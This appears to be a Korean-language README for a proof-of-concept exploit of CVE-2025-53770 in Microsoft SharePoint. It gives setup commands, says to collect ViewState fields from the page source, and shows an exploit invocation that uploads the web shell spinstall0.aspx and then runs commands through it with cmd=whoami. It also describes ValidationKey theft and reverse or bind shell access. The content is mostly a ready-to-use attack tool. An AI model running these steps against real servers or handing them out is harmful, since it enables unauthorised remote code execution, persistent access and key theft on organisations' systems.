
CVE-2025-53770에 대한 익스플로잇 PoC로, SharePoint에 웹쉘 업로드, ValidationKey 추출, 서명된 ViewState 생성, 및 리버스 셸 또는 바인드 셸을 통한 원격 코드 실행을 가능하게 합니다.
이 패키지는 다음을 수행합니다:
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
웹쉘 업로드
SharePoint 페이지에서 페이지 소스에 접근할 수 있습니다. 소스 보기 탭으로 이동하여 사용 가능한 경우 다음을 얻을 수 있으며 복사할 수 있습니다:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (컨텍스트를 위한 현재 __VIEWSTATE)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
이 명령은 spinstall0.aspx를 업로드합니다. 확인: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami